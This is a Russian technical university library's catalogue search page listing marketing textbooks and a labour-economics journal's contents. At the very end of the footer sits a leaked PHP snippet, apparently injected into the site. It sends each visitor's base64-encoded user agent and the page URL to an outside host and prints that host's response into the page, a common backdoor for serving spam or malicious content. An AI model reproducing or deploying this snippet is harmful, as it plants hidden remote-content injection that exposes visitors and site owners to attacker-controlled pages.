Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

293 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Международный маркетинг")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 17
1. 
Маркетинг [Текст] : Учеб. / Э. А. Уткин, А. И. Кочеткова, Л. И. Юликов и др.; Под ред. Э. А. Уткина, 2003. - 318, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 

В учебнике рассматриваются основные понятия, сущность, закономерности маркетинга как инструмента организации рыночного хозяйствования.

Особое внимание уделено основам комплексного исследования <рынка>, организации и <стимулирования> <сбыта>, выработке <рыночной стратегии> и <тактики>, обеспечивающей решающие преимущества в условиях конкурентной борьбы.

2. 
Блэк, Сэм. Паблик рилейшнз. Что это такое? [Текст] : Пер. с англ. / С. Блэк, 1990. - 239 с.
Держатели документа (Информация об экземплярах) 
3. 
Маркетинг [Текст] : Учеб. для студентов вузов обучающихся по экон. специальностям / Н. Д. Эриашвили, К. Ховард, Ю. А. Цыпкин и др.; Под ред. Н. Д. Эриашвили, 2003. - 630, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- КОНКУРЕНТОСПОСОБНОСТЬ -- ПОТРЕБИТЕЛЬ -- РЫНОК -- РЕАЛИЗАЦИЯ -- ТОВАРНАЯ ПОЛИТИКА -- ЦЕНОВАЯ ПОЛИТИКА -- РОЗНИЧНАЯ ТОРГОВЛЯ -- РЕКЛАМА -- БАНКОВСКИЙ МАРКЕТИНГ -- ИЗДАТЕЛЬСКИЙ МАРКЕТИНГ -- ЭКОЛОГИЧЕСКИЙ МАРКЕТИНГ -- ТУРИСТИЧЕСКИЙ -- КОНЪЮНКТУРА -- МЕЖДУНАРОДНЫЙ МАРКЕТИНГ -- СЕГМЕНТАЦИЯ РЫНКА -- КОММУНИКАЦИЯ МАРКЕТИНГОВАЯ -- Реклама промышленная -- КОМПАНИЯ РЕКЛАМНАЯ -- СООБЩЕНИЕ РЕКЛАМНОЕ -- СЛУЖБА МАРКЕТИНГА -- Промышленность - Маркетинг -- Строительство - Маркетинг -- АПК - Маркетинг -- МАРКЕТИНГ БАНКОВСКИЙ -- МАРКЕТИНГ издательский -- МАРКЕТИНГ ЭКОЛОГИЧЕСКИЙ -- АУДИТ ЭКОЛОГИЧЕСКИЙ -- ОТЧЕТНОСТЬ ЭКОЛОГИЧЕСКАЯ -- МАРКЕТИНГ ТУРИЗМА -- ТУРИЗМ МЕЖДУНАРОДНЫЙ -- ТУРИЗМ - МАРКЕТИНГ -- Франшиза -- МАРКЕТИНГ МЕЖДУНАРОДНЫЙ -- ЭФФЕКТИВНОСТЬ МАРКЕТИНГА -- МАРКЕТИНГ - ПРАВО

Учебник включает четыре раздела: "Теоретические основы маркетинга" (концепции, функции, технологии маркетинга; маркетинговые исследования; товарная, ценовая политика; коммуникации; реклама); "Маркетинг в отраслях и сферах деятельности" (промышленость, строительство, АПК, туризм и т.д.); "Эффективность маркетинговой деятельности" (оценка и показатели эффективности); "Правовое регулирование маркетинговой деятельности".

4. 
Багиев, Георгий Леонидович. Международный маркетинг [Текст] : Учебник гриф-УМО / Г. Л. Багиев, Н. К. Моисеева, В. И. Черенков, 2009. - 688 с. с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Котлер, Филип. Основы маркетинга : краткий курс / Ф. Котлер; пер. с англ., 2003. - 656 с.
Держатели документа (Информация об экземплярах) 
6. 
Человек и труд. - Журнал, 2009г. № 11
Оглавление 
  • Довбий, И. Банковское кредитование инновационной деятельности6 человеческий фактор - фактор риска / И. Довбий. - с.12-14
    Кл. слова: человеческий капитал, банковская деятельность
  • Кузнецова, А. Республика Башкортостан: особенности подготовки квалифицированных специалистов для сельского рынка труда / А. Кузнецова. - с.15-17
    Кл. слова: дисбаланс трудовых ресурсов, человеческий капитал
  • Петров, Д. Жизненные ориентиры современной молодежи / Д. Петров. - с.18-19
    Кл. слова: молодежная безработица, человеческий капитал, оплата труда
  • Ракоти, В. Проблемы личных доходов и расходов в условиях кризиса / В. Ракоти. - с.20-26
    Кл. слова: потребительские цены, уровень благосостояния, скрытая безработица
  • Шевчук, Я. Ратификация Европейской социальной хартии и конвенций МОТ - фактор развития КСО / Я. Шевчук. - с.27-28
  • Набоко, С. Формирование системы вознаграждения с ориентацией на конечный результат / С. Набоко. - с.29-31
    Кл. слова: материальное стимулирование, премии, надбавки
  • Понизов, В. О работе Российской трехсторонней комиссии по регулированию социально-трудовых отношений / В. Понизов. - с.32-34
  • Пашин, Н. Приоритеты реформирования системы государственного управления охраной труда в Российской Федерации / Н. Пашин. - с.35-37
    Кл. слова: производственный травматизм, организация обучения, профессиональные заболевания
  • Беспалов, М. Роль налоговой политики в развитии предпринимательства / М. Беспалов. - с.38-41
    Кл. слова: предпринимательская деятельность, экономический кризис, государство
  • Пахомова, Е. Агрохолдинг как промежуточный институт / Е. Пахомова. - с.42-43
    Кл. слова: сельское хозяйство, процедура банкротства, экономическая политика
  • Арефьева, А. Швеция: анализ факторов, определяющих конкурентоспособность страны в условиях глобализации / А. Арефьева. - с.44-46
    Кл. слова: экспорт, инновационный потенциал, экономическая политика
  • Трегубенко, Е. К вопросу о вступлении Турции в ЕС / Е. Трегубенко. - с.47-49
    Кл. слова: правоприменительная практика, макроэкономическая стабилизация, иностранные инвестиции
  • Сочнева, Е. Социальный аудит: институциональный подход / Е. Сочнева. - с.50-52
    Кл. слова: конкуренция, бизнес, социальная ответственность
  • Миляева, Л. Управление качеством трудовой жизни персонала организации / Л. Миляева. - с.53-56
  • Селин, И. Рационализация численности персонала на промышленном предприятии / И. Селин. - с.57-60
    Кл. слова: управление, планирование персонала
  • Подвербных, О. Кадровое обеспечение инвестиционных проектов / О. Подвербных. - с.61-63
    Кл. слова: трудовой потенциал, профессиональные диспропорции, дефицит работников
  • Войтюк, С. Построение эффективной системы управления персоналом в корпоративном управлении / С. Войтюк. - с.64-65
    Кл. слова: модель найма, корпоративная система управления, кадры
  • Хабибулин, К. К вопросу о создании глобальных торговых марок / К. Хабибулин. - с.66-68
    Кл. слова: стратегическое управление, международный маркетинг, рыночные технологии
  • Бородаев, А. Маркетинговая стратегия российских компаний / А. Бородаев. - с.69-71
    Кл. слова: единая маркетинговая служба, организационная структура, функции управления
Держатели документа (Информация об экземплярах) 
7. 
Карпова С. В. Международное рекламное дело : учебное пособие для вузов по специальности "Мировая экономика" / С. В. Карпова, 2007. - 288 с.
Держатели документа (Информация об экземплярах) 
8. 
Котлер, Филип. Основы маркетинга [Текст] / Ф. Котлер; Под ред. Е. М. Пеньковой, Пер. с англ. В. Б. Боброва, 1994. - 698 с.
9. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
10. 
Кнорринг, Владимир Игоревич. Теория, практика и искусство управления [Текст] : Учеб. для вузов по специальности "Менеджмент" / В. И. Кнорринг, 1999. - 511 с.
Держатели документа (Информация об экземплярах) 
11. 
Маркетинг [Текст] : Учеб. / Э. А. Уткин, А. И. Кочеткова, Л. И. Юликов, 1999. - 319 с.
12. 
Деловое планирование [Текст] : Методы. Организация. Соврем. практика: Учеб. пособие для экон. специальностей / В. М. Попов, Л. П. Кураков, С. И. Ляпунов, Х. Х. Мингазов, 1997. - 366 с.
Держатели документа (Информация об экземплярах) 
13. 
Барсукова, Светлана Васильевна. Международное рекламное дело [Текст] : Учеб. пособие по специальностям: "Финансы и кредит", "Бухгалт. учет и аудит", "Мировая экономика" / С. В. Барсукова, 1999. - 202 с.
Держатели документа (Информация об экземплярах) 
14. 
Котлер, Филип. Основы маркетинга [Текст] / Ф. Котлер; Пер. с англ. В. Б. Боброва; Под ред. Е. М. Пеньковой, 1992. - 734 с.
Держатели документа (Информация об экземплярах) 
15. 
Эванс Дж. Р. Маркетинг [Текст] : Пер. с англ. / Дж. Р. Эванс, Б. Берман, 2000. - 308 с.
16. 
Международный маркетинг [Текст] : Учеб. пособие для вузов, обучающихся по экон. специальностям / Г. А. Васильев, Л. А. Ибрагимов, Н. Г. Каменева, 1999. - 199 с.
17. 
Маркетинг [Текст] : Учеб. для вузов, по специальностям "Маркетинг" и "Менеджмент" / А. Н. Романов, Ю. Ю. Корлюгов, С. А. Красильников, 1996. - 558 с.
Ключевые слова 
Маркетинг -- Рынок -- Товар -- Цена -- Ценообразование -- Ценовая политика -- Предприятие -- Спрос -- Сбыт -- Биржевая деятельность -- СЕГМЕНТАЦИЯ -- ИЗУЧЕНИЕ -- ПОТРЕБИТЕЛЕЙ -- ОБЕСПЕЧЕНИЕ -- КАЧЕСТВА -- КОНКУРЕНТОСПОСОБНОСТИ -- СЕРВИС -- РЕАЛИЗАЦИЯ -- КОММУНИКАЦИИ -- РЕКЛАМА -- паблик -- рилейшнз -- ЦЕНЫ -- ЦЕНООБРАЗОВАНИЕ -- КОНТРОЛЬ -- БИЗНЕС-ПЛАН ПРЕДПРИЯТИЯ -- МЕЖДУНАРОДНЫЙ МАРКЕТИНГ -- БИРЖЕВАЯ ДЕЯТЕЛЬНОСТЬ -- БАНКОВСКИЙ МАРКЕТИНГ -- ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ В МАРКЕТИНГЕ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2902 - 21.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.97 с.14 запросов, 0.73c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;